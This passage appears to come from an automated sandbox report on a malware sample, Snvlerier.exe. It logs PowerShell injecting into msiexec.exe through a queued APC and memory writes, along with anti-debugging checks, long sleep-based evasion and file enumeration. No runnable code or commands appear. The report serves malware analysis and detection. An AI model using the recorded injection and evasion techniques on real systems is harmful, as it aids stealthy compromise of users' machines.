            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597796Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597687Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597578Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597468Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597250Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597140Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597031Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596812Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596703Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596593Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596454Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595797Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595124Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594796Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594687Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7840Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1798Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -27670116110564310s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8008Thread sleep count: 8700 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8008Thread sleep count: 1154 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -599218s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -598890s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -598672s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -598343s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -598234s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -598125s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -598015s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -597906s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -597796s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -597687s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -597578s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -597468s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -597359s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -597250s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -597140s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -597031s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -596922s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -596812s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -596703s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -596593s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -596454s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -596343s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -596234s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -596125s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -596015s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -595906s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -595797s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -595672s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -595562s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -595453s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -595343s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -595234s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -595124s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -595015s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -594906s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -594796s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -594687s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8004Thread sleep time: -594578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Snvlerier.exeCode function: 0_2_00405FF1 FindFirstFileA,FindClose,0_2_00405FF1
            Source: C:\Users\user\Desktop\Snvlerier.exeCode function: 0_2_0040264F FindFirstFileA,0_2_0040264F
            Source: C:\Users\user\Desktop\Snvlerier.exeCode function: 0_2_004055CA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055CA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597796Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597687Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597578Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597468Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597250Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597140Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597031Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596812Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596703Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596593Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596454Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595797Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595124Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594796Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594687Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594578Jump to behavior
            Source: msiexec.exe, 00000006.00000002.3053737496.000000000576A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3053737496.00000000057C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Snvlerier.exeAPI call chain: ExitProcess graph end nodegraph_0-3352
            Source: C:\Users\user\Desktop\Snvlerier.exeAPI call chain: ExitProcess graph end nodegraph_0-3515
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0087D869 LdrInitializeThunk,1_2_0087D869
            Source: C:\Users\user\Desktop\Snvlerier.exeCode function: 0_2_00406018 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406018
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3D60000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
